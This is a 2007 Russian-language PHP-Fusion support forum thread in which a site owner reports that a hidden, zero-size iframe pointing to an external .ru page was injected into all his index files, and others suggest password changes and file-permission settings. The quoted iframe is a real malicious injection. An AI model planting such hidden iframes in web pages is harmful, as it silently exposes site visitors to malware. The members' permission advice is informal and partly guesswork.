Регистрация    Забыли пароль?        Правила форума    FAQ (читать перед созданием новой темы)
Имя   Пароль  запомнить
  
Просмотр темы
Вернуться на сайт: PHP-Fusion SF Russian Support Site

Форум поддержки PHP-Fusion SF | PHP-Fusion SF - Система Управлением Сайта | Ошибки / Bugs Reports
# 1 Тема: Обнаружен вирус
Provlax
Пользователь

Avatar пользователя




Местный

Сообщений: 41
Зарегистрирован: 01 Ноября 2007, 11:58:59
Сказали спасибо 1 раз
Статус: offline
ICQ статус 404651861
Опубликовано 10 Декабря 2007, 14:58:47
Недавно заметил, что ко всем индексным файлам моего сайта приписан этот код:
<iframe src='http://www.utils.gsm-ping.ru/ic/index.php ' width='0' height='18' style='display:none'></iframe>

. Антивирус ругается при попытки зайти на сайт.

Раньше этой строчки небыло, появилась сама по себе. Как такое могло произойти и что сдалеть, чтобы этого больше не было?
 
^ наверх ^ 404651861
# 2  
Sky
Супер Администратор

Avatar пользователя

АнарХия Х4

Администратор

Сообщений: 3023
Откуда: Astana
Зарегистрирован: 01 Апреля 2007, 18:11:10
Сказали спасибо 470 раз
Статус: offline
Опубликовано 10 Декабря 2007, 15:09:36
все притензии хостеру это раз, меняй все пароли на фтп и тд - это два, старайся чтобы файлы были с 644 это три!


--------------------
Я в контакте

Народ читаем и запоминаем!
Не помогаю по ICQ
Не помогаю по ЛС
буду просто игнорировать эти сообщения!
Все вопросы задаем на форуме, но предварительно пользуемся поиском!
^ наверх ^
# 3  
Provlax
Пользователь

Avatar пользователя




Местный

Сообщений: 41
Зарегистрирован: 01 Ноября 2007, 11:58:59
Сказали спасибо 1 раз
Статус: offline
ICQ статус 404651861
Опубликовано 10 Декабря 2007, 15:17:36
Sky написал:
все притензии хостеру это раз, меняй все пароли на фтп и тд - это два, старайся чтобы файлы были с 644 это три!


Стоит на всех index.php 644. Хацкеры - сволочи!!!! Млин терь даже залогиниться на сайт не могу. smiley
 
^ наверх ^ 404651861
# 4  
Provlax
Пользователь

Avatar пользователя




Местный

Сообщений: 41
Зарегистрирован: 01 Ноября 2007, 11:58:59
Сказали спасибо 1 раз
Статус: offline
ICQ статус 404651861
Опубликовано 10 Декабря 2007, 15:31:01
Эта хрень 'http://www.utils.gsm-ping.ru/ic/index.p... может собирать пороли с сайта?????
 
^ наверх ^ 404651861
# 5  
classic
SF Team

Avatar пользователя

Классик

SF Support Team

Любитель Fusion

Сообщений: 353
Откуда: Москва, ВАО, Перово
Зарегистрирован: 18 Октября 2007, 01:42:47
Сказали спасибо 51 раз
Статус: offline
ICQ статус 350192996
Опубликовано 10 Декабря 2007, 19:11:51
старайся чтобы файлы были с 644 это три


Я себе поставил 440.
 
^ наверх ^ 350192996
# 6  
oldihome
Пользователь

Avatar пользователя

1q

Любитель Fusion

Сообщений: 148
Откуда: q11q
Зарегистрирован: 24 Сентября 2007, 15:58:13
Сказали спасибо 0 раз
Статус: offline
Опубликовано 10 Декабря 2007, 20:00:53
classic написал:
старайся чтобы файлы были с 644 это три


Я себе поставил 440.

а смысл какой?


--------------------
Наш строительный порал WWW.OLDIHOME.RU
Домашний любимец WWW.DRUG.OLDIHOME.RU
ProSex WWW.PLUS.OLDIHOME.RU
Авто Японии WWW.AVTO.OLDIHOME.RU
^ наверх ^ http://www.oldihome.ru
# 7  
classic
SF Team

Avatar пользователя

Классик

SF Support Team

Любитель Fusion

Сообщений: 353
Откуда: Москва, ВАО, Перово
Зарегистрирован: 18 Октября 2007, 01:42:47
Сказали спасибо 51 раз
Статус: offline
ICQ статус 350192996
Опубликовано 10 Декабря 2007, 20:41:15
не знаю точно, но если я правильно понимаю изменить файл можно будет только по ftp
то есть файл доступен только для чтения, ничего в него подобное записать нельзя
никакой вирус не сможет прописать в него подобные iframe
 
^ наверх ^ 350192996
# 8  
oldihome
Пользователь

Avatar пользователя

1q

Любитель Fusion

Сообщений: 148
Откуда: q11q
Зарегистрирован: 24 Сентября 2007, 15:58:13
Сказали спасибо 0 раз
Статус: offline
Опубликовано 11 Декабря 2007, 09:44:51
а на сколько я понимаю, 644 тоже для доступа только по фтп. Или я не прав?


--------------------
Наш строительный порал WWW.OLDIHOME.RU
Домашний любимец WWW.DRUG.OLDIHOME.RU
ProSex WWW.PLUS.OLDIHOME.RU
Авто Японии WWW.AVTO.OLDIHOME.RU
^ наверх ^ http://www.oldihome.ru
# 9  
classic
SF Team

Avatar пользователя

Классик

SF Support Team

Любитель Fusion

Сообщений: 353
Откуда: Москва, ВАО, Перово
Зарегистрирован: 18 Октября 2007, 01:42:47
Сказали спасибо 51 раз
Статус: offline
ICQ статус 350192996
Опубликовано 11 Декабря 2007, 12:26:27
тут надо понять, какими способами в файле может появлятся вирус, указанный iframe ?

http://forum.joom.ru/index.php?action=printpage;topic=11020.0
самый низ
На ВСЕ остальные папки можно поставить права 555, а на файлы - 444, т.е. НИКТО не сможет в них записывать. При правильной настройке прав у хостера (когда apache и владелец аккаунта находятся в одной группе), можно даже поставить права 750 и 440, чтобы и читать не смогли.

 
^ наверх ^ 350192996
# 10  
sergey_k
Пользователь

Avatar пользователя




новичек

Сообщений: 2
Зарегистрирован: 01 Сентября 2007, 00:35:43
Сказали спасибо 0 раз
Статус: offline
Опубликовано 29 Декабря 2007, 00:12:34
почитайте тут
 
^ наверх ^
Перейти на форум:


105,568,785 уникальных посетителей
сейчас: 24 Ноября 2024, 15:22:09
Генерация страницы: 0.31 сек.

Original size:30 кб.
GZipped size: 7 кб.
Compression:79%